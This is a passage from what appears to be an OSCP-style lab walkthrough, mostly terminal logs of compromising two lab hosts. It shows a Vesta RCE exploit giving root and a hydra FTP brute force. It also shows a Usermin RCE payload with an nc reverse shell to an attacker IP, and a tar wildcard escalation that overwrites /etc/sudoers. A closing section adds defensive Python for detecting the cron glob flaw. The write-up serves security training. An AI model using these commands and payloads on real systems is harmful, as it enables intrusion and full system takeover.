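Feed it `snmpwalk -v2c -c <community> <host> NET-SNMP-EXTEND-MIB::nsExtendObjects` output from your own hosts. The fix on the agent side is to drop extend entries that carry secrets, stop using the default community, and restrict the read community to a view that excludes the extend subtree; a one-off password reset belongs in configuration management, not in snmpd.conf.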
┌──(kali🎃kali)-[~/oscp/156/vesta-rce-exploit]
└─$ python vesta-rce-exploit.py https://192.168.135.156:8083 jack 3PUKsX98BMupBiCf
[INFO] Attempting login to https://192.168.135.156:8083 as jack
[+] Logged in as jack
[INFO] Checking for existing webshell or creating one
[!] xzy0qvzq2m.poc not found, creating one...
[+] xzy0qvzq2m.poc added
[+] xzy0qvzq2m.poc found, looking up webshell
[!] webshell not found, creating one..
[+] Webshell uploaded
[INFO] Creating mailbox on domain xzy0qvzq2m.poc
[!] Mail domain not found, creating one..
[+] Mail domain created
[+] Mail account created
[INFO] Editing mailbox to test payload
[INFO] Deploying backdoor via mailbox editing
[INFO] [+] Root shell possibly obtained. Enter commands:
# id
uid=0(root) gid=0(root) groups=0(root)
Read local.txt
# cat /home/jack/local.txt
9cfca959e54738e70905a4024d16a44a
# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.135.156 netmask 255.255.255.0 broadcast 192.168.135.255
inet6 fe80::250:56ff:feab:708 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:ab:07:08 txqueuelen 1000 (Ethernet)
RX packets 94989 bytes 6111879 (6.1 MB)
RX errors 0 dropped 757 overruns 0 frame 0
TX packets 84189 bytes 7450035 (7.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8205 bytes 847767 (847.7 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8205 bytes 847767 (847.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Read proof.txt
# cat /root/proof.txt
07fd2596d9afbb88f7864b5dd02244ea
# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.135.156 netmask 255.255.255.0 broadcast 192.168.135.255
inet6 fe80::250:56ff:feab:708 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:ab:07:08 txqueuelen 1000 (Ethernet)
RX packets 94102 bytes 6021197 (6.0 MB)
RX errors 0 dropped 755 overruns 0 frame 0
TX packets 83675 bytes 6854793 (6.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 7483 bytes 765378 (765.3 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7483 bytes 765378 (765.3 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
192.168.135.157 - Charlie
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
20000/tcp open dnp
Initial Access
FTP anonymous login succeeded
┌──(kali🎃kali)-[~/oscp/157]
└─$ ftp 192.168.135.157
Connected to 192.168.135.157.
220 (vsFTPd 3.0.5)
Name (192.168.135.157:kali): anonymous
331 Please specify the password.
Password:
230 Login successful
PDF files found in the backup directory
ftp> ls
229 Entering Extended Passive Mode (|||10097|)
150 Here comes the directory listing.
drwxr-xr-x 2 114 120 4096 Nov 02 2022 backup
226 Directory send OK.
ftp> cd backup
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||10099|)
150 Here comes the directory listing.
-rw-r--r-- 1 114 120 145831 Nov 02 2022 BROCHURE-TEMPLATE.pdf
-rw-r--r-- 1 114 120 159765 Nov 02 2022 CALENDAR-TEMPLATE.pdf
-rw-r--r-- 1 114 120 336971 Nov 02 2022 FUNCTION-TEMPLATE.pdf
-rw-r--r-- 1 114 120 739052 Nov 02 2022 NEWSLETTER-TEMPLATE.pdf
-rw-r--r-- 1 114 120 888653 Nov 02 2022 REPORT-TEMPLATE.pdf
Download the PDFs
ftp> mget *
mget BROCHURE-TEMPLATE.pdf [anpqy?]? a
Prompting off for duration of mget.
229 Entering Extended Passive Mode (|||10096|)
150 Opening BINARY mode data connection for BROCHURE-TEMPLATE.pdf (145831 bytes).
100% |***************************************************************************| 142 KiB 319.42 KiB/s 00:00 ETA
226 Transfer complete.
145831 bytes received in 00:00 (241.87 KiB/s)
229 Entering Extended Passive Mode (|||10092|)
150 Opening BINARY mode data connection for CALENDAR-TEMPLATE.pdf (159765 bytes).
100% |***************************************************************************| 156 KiB 338.52 KiB/s 00:00 ETA
226 Transfer complete.
159765 bytes received in 00:00 (254.41 KiB/s)
229 Entering Extended Passive Mode (|||10092|)
150 Opening BINARY mode data connection for FUNCTION-TEMPLATE.pdf (336971 bytes).
100% |***************************************************************************| 329 KiB 396.25 KiB/s 00:00 ETA
226 Transfer complete.
336971 bytes received in 00:00 (341.38 KiB/s)
229 Entering Extended Passive Mode (|||10094|)
150 Opening BINARY mode data connection for NEWSLETTER-TEMPLATE.pdf (739052 bytes).
100% |***************************************************************************| 721 KiB 535.89 KiB/s 00:00 ETA
226 Transfer complete.
739052 bytes received in 00:01 (487.95 KiB/s)
229 Entering Extended Passive Mode (|||10098|)
150 Opening BINARY mode data connection for REPORT-TEMPLATE.pdf (888653 bytes).
100% |***************************************************************************| 867 KiB 722.38 KiB/s 00:00 ETA
226 Transfer complete.
888653 bytes received in 00:01 (648.10 KiB/s)
Check the PDF authors
- Cassie
- Mark
- Robert
┌──(kali🎃kali)-[~/oscp/157]
└─$ exiftool *.pdf | grep Author
Author : Cassie
Author : Mark
Author : Robert
FTP login brute force with hydra
- Login possible with cassie / cassie
┌──(kali🎃kali)-[~/oscp/157]
└─$ hydra -L users.txt -P users.txt ftp://192.168.135.157 -t 50
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-26 11:54:55
[DATA] max 36 tasks per 1 server, overall 36 tasks, 36 login tries (l:6/p:6), ~1 try per task
[DATA] attacking ftp://192.168.135.157:21/
[21][ftp] host: 192.168.135.157 login: cassie password: cassie
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-26 11:55:00
Web service access on port 20000
- Usermin service
- Logged in successfully with cassie / cassie
Usermin authenticated RCE vulnerability present
┌──(kali🎃kali)-[~/oscp/157/userminrce]
└─$ searchsploit Usermin
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Usermin 1.750 - Remote Command Execution (Metasploit) | linux/webapps/46468.rb
Usermin 1.820 - Remote Code Execution (RCE) (Authenticated) | linux/webapps/50234.py
Usermin 2.100 - Username Enumeration | multiple/webapps/52254.py
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing | linux/remote/22275.pl
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure | multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure | multiple/remote/2017.pl
Webmin Usermin 2.100 - Username Enumeration | perl/webapps/52114.py
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Download the PoC
┌──(kali🎃kali)-[~/oscp/157/userminrce]
└─$ searchsploit -m 50234
Exploit: Usermin 1.820 - Remote Code Execution (RCE) (Authenticated)
URL: https://www.exploit-db.com/exploits/50234
Path: /usr/share/exploitdb/exploits/linux/webapps/50234.py
Codes: N/A
Verified: False
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/oscp/157/userminrce/50234.py
Run the PoC after changing listen_ip in its code
┌──(kali🎃kali)-[~/oscp/157]
└─$ python 50234.py --host 192.168.135.157 --login cassie --password cassie
/home/kali/oscp/157/50234.py:82: SyntaxWarning: invalid escape sequence '\?'
last_gets_key = re.findall("edit_key.cgi\?(.*?)'",str(key_list.content))[-2]
[+] Target https://192.168.135.157:20000
[+] Login successfully
[+] Setup GnuPG
[+] Payload {'name': '";rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.199 1337 >/tmp/f;echo "', 'email': '1337@webmin.com'}
[+] Setup successful
[+] Fetching key list
[+] Key : idx=3\
Traceback (most recent call last):
nc reverse shell connection established
┌──(kali🎃kali)-[~/oscp/157]
└─$ rlwrap nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.45.199] from (UNKNOWN) [192.168.135.157] 41580
sh: cannot set terminal process group (1019): Inappropriate ioctl for device
sh: no job control in this shell
sh-5.1$
Read local.txt
sh-5.1$ cat local.txt
cat local.txt
52ceea799729705181436ea3b8f0fabb
sh-5.1$ ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.135.157 netmask 255.255.255.0 broadcast 192.168.135.255
ether 00:50:56:ab:84:03 txqueuelen 1000 (Ethernet)
RX packets 274061 bytes 24052097 (24.0 MB)
RX errors 0 dropped 1178 overruns 0 frame 0
TX packets 315997 bytes 53660451 (53.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 3760 bytes 270530 (270.5 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3760 bytes 270530 (270.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Privilege Escalation
linux-smart-enumeration
- Found tar invoked with a wildcard
[!] ret060 Can we write to executable paths present in cron jobs........... yes!
---
/etc/cron.d/2minutes:*/2 * * * * root cd /opt/admin && tar -zxf /tmp/backup.tar.gz *
Create the files for the tar wildcard privilege escalation
cassie@oscp:/opt/admin$ echo "" > '--checkpoint=1'
cassie@oscp:/opt/admin$ echo "" > '--checkpoint-action=exec=sh shell.sh'
cassie@oscp:/opt/admin$ echo "echo 'cassie ALL=(root) NOPASSWD: ALL' > /etc/sudoers" > shell.sh
cassie@oscp:/opt/admin$ ls -l
total 12
-rw-r--r-- 1 cassie cassie 1 Dec 26 17:48 --checkpoint-action=exec=sh shell.sh
-rw-r--r-- 1 cassie cassie 1 Dec 26 17:47 --checkpoint=1
-rw-r--r-- 1 cassie cassie 54 Dec 26 17:51 shell.sh
After waiting, the tar command runs, the sudoers file is modified, and sudo can be used without a password, so switch to the root account
User cassie may run the following commands on oscp:
(root) NOPASSWD: ALL
cassie@oscp:/opt/admin$ sudo su -
sudo su -
root@oscp:~#
Read proof.txt
cat /root/proof.txt
ce856bfe9c26dadac2a32898adf525cd
root@oscp:~# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.135.157 netmask 255.255.255.0 broadcast 192.168.135.255
ether 00:50:56:ab:84:03 txqueuelen 1000 (Ethernet)
RX packets 278529 bytes 25437073 (25.4 MB)
RX errors 0 dropped 1374 overruns 0 frame 0
TX packets 318780 bytes 54844065 (54.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 4892 bytes 350922 (350.9 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4892 bytes 350922 (350.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
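The cron job that linux-smart-enumeration found on Charlie (`cd /opt/admin && tar -zxf /tmp/backup.tar.gz *`, run as root in a directory cassie can write to) fails for a reason that has nothing to do with tar itself: the shell expands `*` before tar starts, so any file name beginning with `-` arrives in tar's argument list indistinguishable from an option. As an added example that is not part of this writeup, the Python below creates a throwaway directory with one option-shaped file name (the same name the writeup used, though nothing here runs tar), shows what `/bin/sh` hands to a command for `*` versus `./*`, and includes a small check that flags a bare `*` passed to tar in a cron command line. The directory, file names and cron lines are constructed for the demo.

```python
import os
import re
import subprocess
import tempfile

# Constructed for the demo: the file name mirrors the one created on Charlie,
# but only shell expansion is exercised here; tar is never invoked.
OPTION_LIKE_NAME = "--checkpoint=1"


def make_demo_dir():
    """A throwaway directory with one ordinary file and one option-shaped name."""
    d = tempfile.mkdtemp(prefix="wildcard-demo-")
    for name in ("report.txt", OPTION_LIKE_NAME):
        open(os.path.join(d, name), "w").close()
    return d


def shell_expand(directory, pattern):
    """Let /bin/sh expand `pattern` inside `directory`, as the cron line does.

    printf "%s\\n" prints one expanded word per line, so the result is exactly
    the argument vector a command such as tar would receive.
    """
    res = subprocess.run(["sh", "-c", f'printf "%s\\n" {pattern}'],
                         cwd=directory, capture_output=True, text=True, check=True)
    return res.stdout.splitlines()


def option_like(args):
    """Words a getopt-style parser (GNU tar included) would read as options."""
    return [a for a in args if a.startswith("-")]


def bare_glob_after_tar(cron_command):
    """True when a tar invocation in the command receives a bare '*' argument.

    The schedule fields of a cron line also contain '*', so only tokens after
    the 'tar' word of each pipeline segment are inspected.
    """
    for segment in re.split(r"&&|\|\||;|\|", cron_command):
        tokens = segment.split()
        if "tar" in tokens and "*" in tokens[tokens.index("tar") + 1:]:
            return True
    return False


if __name__ == "__main__":
    d = make_demo_dir()
    for pattern in ("*", "./*"):
        words = shell_expand(d, pattern)
        print(f"{pattern:4} -> {words}  option-like: {option_like(words)}")
    vulnerable = "*/2 * * * * root cd /opt/admin && tar -zxf /tmp/backup.tar.gz *"
    hardened = "*/2 * * * * root cd /opt/admin && tar -zxf /tmp/backup.tar.gz"
    print("bare glob after tar:", bare_glob_after_tar(vulnerable), bare_glob_after_tar(hardened))
```

Prefixing the glob with `./`, or terminating option parsing with `--` before the names, keeps directory contents from being read as options; extracting without a member list removes the glob entirely. The more important fix is structural: a root cron job should never `cd` into, or glob over, a directory that unprivileged users can write to, because the option-injection here is only one of several ways such a directory can be abused.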